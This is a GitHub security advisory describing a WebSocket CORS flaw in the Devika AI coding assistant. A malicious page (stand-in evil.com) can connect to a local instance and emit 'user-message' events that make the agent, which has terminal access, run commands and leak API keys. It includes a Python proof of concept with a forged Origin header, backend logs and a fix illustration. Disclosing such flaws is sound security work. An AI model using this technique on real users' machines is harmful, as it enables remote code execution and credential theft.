
[Security] Unauthenticated WebSocket CORS Bypass Leads to Remote Code Execution via Agent Control #711

@YLChen-007

Description

Advisory Details

Title: Unauthenticated WebSocket CORS Bypass Leads to Remote Code Execution via Agent Control

Description:

Summary

The fix for CVE-2024-5549 in the Devika backend is incomplete: any unauthenticated, attacker-controlled website can still establish a WebSocket connection to a victim's local Devika instance. By bypassing the CORS restrictions on the WebSocket interface, an attacker can silently command the victim's AI agent to execute arbitrary code or exfiltrate sensitive configuration, resulting in Remote Code Execution (RCE).

Details

Devika is an AI coding assistant that uses a series of agents to generate software projects. While the developers successfully patched the HTTP REST API to restrict Cross-Origin Resource Sharing (CORS) to localhost:3000 (fixing CVE-2024-5549), the WebSocket server configuration was left unsecured.

In src/socket_instance.py, the Flask-SocketIO server is instantiated with the cors_allowed_origins="*" parameter:

socketio = SocketIO(cors_allowed_origins="*", async_mode="gevent")

Because WebSocket connections initiate via HTTP GET requests but are upgraded to the WebSocket protocol, this configuration instructs the backend to accept WebSocket handshakes from any Origin header. In a real-world scenario, if a developer is running Devika locally (listening on 127.0.0.1:1337) and visits any malicious website (http://evil.com), the JavaScript on that malicious site can establish a connection to ws://127.0.0.1:1337. Since the origin is ignored, the connection succeeds.
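As an added illustration (not code from the Devika project), the following models the Origin check the Engine.IO handshake goes through under the vulnerable "*" setting and under an exact-match allowlist, fed a constructed handshake from http://evil.com; the allowlist value http://localhost:3000 and the simplified semantics of python-engineio's check are assumptions.

```python
# Constructed settings: the vulnerable value from src/socket_instance.py next to
# the corrected form, an exact allowlist of the frontend origin (value assumed).
VULNERABLE = {"cors_allowed_origins": "*"}
HARDENED = {"cors_allowed_origins": ["http://localhost:3000"]}


def origin_accepted(origin, cors_allowed_origins, host="127.0.0.1:1337", scheme="http"):
    """Approximate the Origin check python-engineio applies to the Engine.IO
    handshake GET before the WebSocket upgrade; returns (accepted, reason).
    "*": any Origin passes (this advisory's bug).  None: only the server's
    own scheme://host passes.  list: Origin must equal an entry exactly.
    No Origin header: passes, because only browsers send one; the setting
    cannot defend against non-browser clients like the PoC's forged header."""
    if origin is None:
        return True, "no Origin header (non-browser client)"
    if cors_allowed_origins == "*":
        return True, "wildcard accepts any origin"
    if cors_allowed_origins is None:
        allowed = [f"{scheme}://{host}"]
    else:
        allowed = list(cors_allowed_origins)
    if origin in allowed:
        return True, "origin on allowlist"
    return False, f"origin {origin!r} not in {allowed!r}"


def handshake_origin(raw_request):
    """Extract the Origin header from a raw HTTP upgrade request (bytes)."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "origin":
            return value.strip()
    return None


# Constructed handshake, as a browser on http://evil.com would send it to the local instance.
EVIL_HANDSHAKE = (
    b"GET /socket.io/?EIO=4&transport=websocket HTTP/1.1\r\n"
    b"Host: 127.0.0.1:1337\r\n"
    b"Origin: http://evil.com\r\n"
    b"Upgrade: websocket\r\n\r\n"
)

if __name__ == "__main__":
    origin = handshake_origin(EVIL_HANDSHAKE)
    for name, cfg in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        ok, why = origin_accepted(origin, cfg["cors_allowed_origins"])
        print(f"{name}: {'ACCEPT' if ok else 'REJECT'} ({why})")
```

Exact-match allowlisting also rejects look-alike origins such as http://localhost:3000.evil.com, but it only stops browser-initiated connections; since the PoC below sets its own Origin header, the WebSocket events still need authentication as a second layer.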

Once connected, the attacker has full access to the WebSocket API. They can emit a user-message event:

socket.emit("user-message", {
  message: "Execute arbitrary commands...",
  base_model: "GPT-4o",
  project_name: "pwned",
});

This directly invokes the underlying AI agent, which has access to a live terminal_session. The agent then executes the attacker's commands on the victim's system. Additionally, the attacker can silently read all incoming server-message events, which broadcast the agent's output, including API keys or local files if the agent is instructed to read them.

PoC

  1. Assume Devika is running locally on the default port (http://127.0.0.1:1337).
  2. The attacker hosts the following Python script (simple_ws_poc.py) to simulate a connection from a malicious origin, bypassing the browser constraints:

import socketio
import time

sio = socketio.Client()

@sio.event
def connect():
    print("[+] Connected to Devika WebSocket API!")
    print(f"[+] Session ID (sid): {sio.sid}")
    print("[+] Sending malicious request to bypass CORS...")
    sio.emit('user-message', {
        'message': "Print 'Hello from external CORS bypass PoC'",
        'project_name': 'cors_poc_test',
        'base_model': 'GPT-4o'
    })
    time.sleep(2)
    sio.disconnect()

try:
    print("[*] Attempting cross-origin connection...")
    sio.connect('http://127.0.0.1:1337', headers={'Origin': 'http://evil.com'})
    sio.wait()
except Exception as e:
    print(f"[-] Connection failed: {e}")

  3. Run the script: python3 simple_ws_poc.py (requires the python-socketio package).
  4. Observe the script output confirming the connection, then check the Devika backend logs.

Log of Evidence

Output from the PoC script:

[*] Attempting cross-origin connection...
[+] Connected to Devika WebSocket API!
[+] Session ID (sid): 99WfTwMcHUsRpD9TAAAE
[+] Sending malicious request to bypass CORS...

Output from the Devika backend logs confirming the cross-origin websocket message was received and executed:

26.03.06 11:33:13: root: INFO   : User message: {'message': "Print 'Hello from external CORS bypass PoC'", 'base_model': 'GPT-4o', 'project_name': 'cors_poc_test', 'search_engine': 'duckduckgo'}
[*] Agent thread started for project: cors-poc-test
[*] Agent created, executing...

Impact

Remote Code Execution. If a victim has Devika running locally and visits a manipulated web page or clicks a malicious link, an attacker can execute arbitrary OS commands on the victim's machine in the context of the user running Devika. They can also steal sensitive data such as source code, API keys, or project histories.

Affected products

  • Ecosystem: python
  • Package name: stitionai/devika
  • Affected versions: All versions (e.g., latest d6a096c main branch)
  • Patched versions:

Severity

  • Severity: High
  • Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Weaknesses

  • CWE: CWE-346: Origin Validation Error

Occurrences

Permalink: https://github.com/stitionai/devika/blob/main/src/socket_instance.py#L4
Description: The instantiation of the SocketIO server with cors_allowed_origins="*", which explicitly accepts connections from any origin and bypasses the HTTP CORS restrictions.
